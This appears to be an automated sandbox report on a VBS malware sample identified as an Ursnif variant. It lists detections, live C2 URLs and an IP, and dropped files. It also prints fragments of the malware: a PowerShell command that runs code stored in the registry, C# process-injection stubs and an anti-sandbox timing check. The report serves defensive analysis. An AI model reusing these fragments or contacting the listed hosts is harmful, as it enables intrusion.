Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	Path Interception	Process Injection112	Disable or Modify Tools1	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Scripting121	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API2	Logon Script (Windows)	Logon Script (Windows)	Scripting121	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution1	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	System Information Discovery56	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter1	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell1	Rc.common	Rc.common	Rootkit4	Cached Domain Credentials	Security Software Discovery24	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading11	DCSync	Virtualization/Sandbox Evasion41	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Modify Registry1	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion41	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection112	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
v8MaHZpVOY2L.vbs	34%	Virustotal		Browse
v8MaHZpVOY2L.vbs	13%	ReversingLabs	Script-WScript.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\beneficial.odt	14%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\beneficial.odt	36%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
28.2.rundll32.exe.4440000.4.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Label	Link
gtr.antoinfer.com	12%	Virustotal		Browse
app.flashgameo.at	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G	100%	Avira URL Cloud	malware
https://contoso.com/Icon	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gtr.antoinfer.com	185.228.233.17	true	true	12%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
app.flashgameo.at	185.228.233.17	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K	true	Avira URL Cloud: malware	unknown
http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000025.00000002.732660461.000001D681EC1000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.228.233.17	gtr.antoinfer.com	Russian Federation		64439	ITOS-ASRU	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458149
Start date:	02.08.2021
Start time:	22:02:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	v8MaHZpVOY2L.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@14/8@6/1
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 15.6% (good quality ratio 14.9%) Quality average: 80.8% Quality standard deviation: 27.7%
HCA Information:	Successful, ratio: 71% Number of executed functions: 69 Number of non-executed functions: 40
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.211.6.115, 13.64.90.137, 20.82.210.154, 23.35.236.56, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.235, 80.67.82.211, 20.54.110.249 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Execution Graph export aborted for target mshta.exe, PID 5200 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:05:38	API Interceptor	1x Sleep call for process: wscript.exe modified
22:06:42	API Interceptor	3x Sleep call for process: rundll32.exe modified
22:06:54	API Interceptor	42x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.228.233.17	beneficial.dll	Get hash	malicious	Browse
185.228.233.17	mental.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	beneficial.dll	Get hash	malicious	Browse	208.67.222.222
	2790000.dll	Get hash	malicious	Browse	208.67.222.222
	2770174.dll	Get hash	malicious	Browse	208.67.222.222
	3a94.dll	Get hash	malicious	Browse	208.67.222.222
	laka4.dll	Get hash	malicious	Browse	208.67.222.222
	o0AX0nKiUn.dll	Get hash	malicious	Browse	208.67.222.222
	a.exe	Get hash	malicious	Browse	208.67.222.222
	swlsGbeQwT.dll	Get hash	malicious	Browse	208.67.222.222
	document-1048628209.xls	Get hash	malicious	Browse	208.67.222.222
	document-69564892.xls	Get hash	malicious	Browse	208.67.222.222
	document-1813856412.xls	Get hash	malicious	Browse	208.67.222.222
	document-1776123548.xls	Get hash	malicious	Browse	208.67.222.222
	document-647734423.xls	Get hash	malicious	Browse	208.67.222.222
	document-1579869720.xls	Get hash	malicious	Browse	208.67.222.222
	document-895003104.xls	Get hash	malicious	Browse	208.67.222.222
	document-806281169.xls	Get hash	malicious	Browse	208.67.222.222
	document-1747349663.xls	Get hash	malicious	Browse	208.67.222.222
	document-1822768538.xls	Get hash	malicious	Browse	208.67.222.222
	document-583955381.xls	Get hash	malicious	Browse	208.67.222.222
	document-1312908141.xls	Get hash	malicious	Browse	208.67.222.222
app.flashgameo.at	beneficial.dll	Get hash	malicious	Browse	185.228.233.17
gtr.antoinfer.com	beneficial.dll	Get hash	malicious	Browse	185.228.233.17
	mental.dll	Get hash	malicious	Browse	185.228.233.17
	lj3H69Z3Io.dll	Get hash	malicious	Browse	167.172.38.18
	SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll	Get hash	malicious	Browse	165.232.183.49
	documentation_39236.xlsb	Get hash	malicious	Browse	165.232.183.49
	3a94.dll	Get hash	malicious	Browse	165.232.183.49
	3b17.dll	Get hash	malicious	Browse	165.232.183.49
	9b9dc.dll	Get hash	malicious	Browse	165.232.183.49

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ITOS-ASRU	beneficial.dll	Get hash	malicious	Browse	185.228.233.17
	mental.dll	Get hash	malicious	Browse	185.228.233.17
	1n0JwffkPt.exe	Get hash	malicious	Browse	185.228.233.5
	niaSOf2RtX.exe	Get hash	malicious	Browse	193.187.173.42
	ao9sQznMcA.exe	Get hash	malicious	Browse	193.187.175.114
	k87DGeHNZD.exe	Get hash	malicious	Browse	193.187.175.114
	iiLllZALpo.exe	Get hash	malicious	Browse	193.187.175.114
	E6o11ym5Sz.exe	Get hash	malicious	Browse	193.187.175.114
	Oo0Djz1juc.exe	Get hash	malicious	Browse	193.187.175.114
	JeqzgYmPWu.exe	Get hash	malicious	Browse	193.187.175.114
	HBkYcWWHmy.exe	Get hash	malicious	Browse	185.159.129.78
	report.11.20.doc	Get hash	malicious	Browse	193.187.175.31
	intelligence_11.20.doc	Get hash	malicious	Browse	193.187.175.31
	details-11.20.doc	Get hash	malicious	Browse	193.187.175.31
	deed contract_11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	question 11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	question 11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2d5wfsji.ow5.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slzfxbde.xn1.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\adobe.url Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	108
Entropy (8bit):	4.699454908123665
Encrypted:	false
SSDEEP:	3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
MD5:	99D9EE4F5137B94435D9BF49726E3D7B
SHA1:	4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
SHA-256:	F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
SHA-512:	7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
Malicious:	false
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

C:\Users\user\AppData\Local\Temp\beneficial.odt Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	658944
Entropy (8bit):	6.487765620200357
Encrypted:	false
SSDEEP:	12288:HMUpikM1ABVY4lsBnllWzwazxRvwa9QKC71L715+PoR5nFIlW2i:K4Y4lglQzwyxRvwuSJLT5FIV
MD5:	A4EEA92CBA350C769021968E0C3D73AF
SHA1:	3BF09EBFD34210A55E73985A41BE2A41822F05A7
SHA-256:	41E8BCE42BC1A7AAA24F3747015454C9A9886DEFF8474B9F055176FD0CE299A9
SHA-512:	D4B2E9649CD2C842B158750C6DA2C3004F8BE4C065898EA0FF522D2028997058CA5129B361841BC827F7ED7F61D5F8ACFE890BE9A927EDDD7E4E62D537B226AA
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 36%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................................................................................Rich...........................PE..L.....hJ...........!.....\|...v....................@..........................0............@.........................p...h.......x..................................................................(...@...............h............................text...!{.......\|.................. ..`.rdata... ......."..................@..@.data...............................@....rsrc...............................@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.993655904789625
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
MD5:	C08AF9BD048D4864677C506B609F368E
SHA1:	23B8F42A01326DC612E4205B08115A4B68677045
SHA-256:	EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
SHA-512:	9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.

C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.25585801040946
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f820zxs7+AEszIWXp+N23f8U:p37Lvkmb6KH0pWZE80U
MD5:	52C86D47C84D7CA51507F7D9C3E1BAEE
SHA1:	91D1EFA87D53E0455907538CFCFA3D19B8BDEBF1
SHA-256:	46228A9548CD6F40AC36C067D553064A015E22989517CF8E8AC50525D641ECEE
SHA-512:	B6F0BA284E26FD84C245EBC99F193B7AFF4710251F3FCEDBA60C81391DB2F5DF267B1B596B8987B62983AC8FE2B7B2810F4270157F02DE1384CD424F7E0B2D33
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.0.cs"

C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	modified
Size (bytes):	454
Entropy (8bit):	5.384411204566502
Encrypted:	false
SSDEEP:	6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f820zxs7+AEszIWM:xKIR37Lvkmb6KH0pWZE801
MD5:	D9C3637C36241BF406342EC2CDEC659C
SHA1:	8580B3BADD4EB4202357A2060AA597C1C8785870
SHA-256:	8359448DF79858FF6283E4AEE20B53C2822C6D199A226AC689B7A7E79FC979BA
SHA-512:	2FDDC3328A7A69AFC4B26ADDE5715AD8BE4E70B9A3D4D97A05D1A3A4306C33C84EC4A1523111EEB186A900B4A99D72AF7ABE6256E2DADF029C5FDAD18CB94E5B
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.0.cs"......

C:\Users\user\Documents\20210802\PowerShell_transcript.841618.nGLqID_F.20210802220653.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	976
Entropy (8bit):	5.485955435920702
Encrypted:	false
SSDEEP:	24:BxSA5xvBn8x2DOXUWOLCHGIYBtBCWIHjeTKKjX4CIym1ZJXDOLCHGIYBtBW:BZLvh8oORFeVIqDYB1ZHFeW
MD5:	59448F6C09AD60F77A788FA6C06525EB
SHA1:	4F2250993ACF7153C117A3CC9AB75AA621CFF3DF
SHA-256:	B7498809E43C5ECD53766AC890D9354B170635C9F5B6FB7F69860C6F62010F35
SHA-512:	69FE9D3D95C5F2B90A3BEA67C57D18522E2F220B757E8F58AD2876721849A83D268F6E1EAADE6AC2D5B5BB5101473263DF16A48B737A39C1767989C77F18C765
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210802220653..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 4260..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210802220653..********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.778621513609206
TrID:
File name:	v8MaHZpVOY2L.vbs
File size:	2145907
MD5:	5d6eee678e2f66bef8885b3b3064db81
SHA1:	4f64fdc2929e29ad8c001a0c3d8ad02f175f68d8
SHA256:	9889b06c39eab474b06205ab27007447ee6e7eebdb8ac2e55b31eaacdcde8a49
SHA512:	6dc679a8c71f13b394558c19e95dbd8ab6c6f94063ec7871a5b2a615df5d72a3f9436c0c5d08814c2f90f4d9eb64723ff40e783aa6561165eb392a7a2eca5e18
SSDEEP:	24576:XXPk3DlGCTdgAY8BoiPwebRSbzQUOJ0HnGc7KALe2yYR:XMIHQaoIR
File Content Preview:	UISA = Timer()..For Ysdhh = 1 to 7..WScript.Sleep 1000:..Next..ASDQWE = Timer()..if ASDQWE - UISA < 5 Then..Do: Asrtd = 4: Loop..End if..BjFe = Array(Ww263,yQ,GI,6,9,6,6,6,10,6,6,6,Ki,Ki,6,6,we,6,6,6,6,6,6,6,yE,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/02/21-22:06:41.591709	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49744	80	192.168.2.3	185.228.233.17
08/02/21-22:06:43.038396	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49745	80	192.168.2.3	185.228.233.17
08/02/21-22:06:43.038396	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49745	80	192.168.2.3	185.228.233.17
08/02/21-22:06:44.399979	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49746	80	192.168.2.3	185.228.233.17
08/02/21-22:06:44.399979	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49746	80	192.168.2.3	185.228.233.17
08/02/21-22:07:15.658662	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49747	80	192.168.2.3	185.228.233.17

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 22:06:41.532124043 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:41.590126038 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:41.590289116 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:41.591708899 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:41.690063000 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.125387907 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.125442028 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.125577927 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.126411915 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.126455069 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.126571894 CEST	49744	80	192.168.2.3	185.228.233.17
Aug 2, 2021 22:06:42.130116940 CEST	80	49744	185.228.233.17	192.168.2.3
Aug 2, 2021 22:06:42.130153894 CEST	80	49744	185.228.233.17	192.168.2.3
